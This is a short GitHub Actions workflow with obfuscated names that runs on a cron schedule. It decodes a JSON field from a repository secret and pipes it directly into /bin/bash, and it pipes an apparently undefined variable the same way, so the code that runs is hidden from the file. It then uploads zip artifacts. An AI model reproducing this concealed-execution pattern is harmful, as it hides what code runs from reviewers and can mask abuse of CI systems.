name: jiagaoxiaqing
on:
  workflow_dispatch:

  schedule:
    - cron: '56 1,7,13,19 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiagaoxiaqing
        env:
          jawnu8: ${{ secrets.jawnu8 }}
        run: |
          printf '%s' "$jawnu8" | jq -r .r9278 | /bin/bash
          echo $mmoe02170 | jq -r .x77 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: 1olaKPcZ
          path: "*.zip"
          retention-days: 1
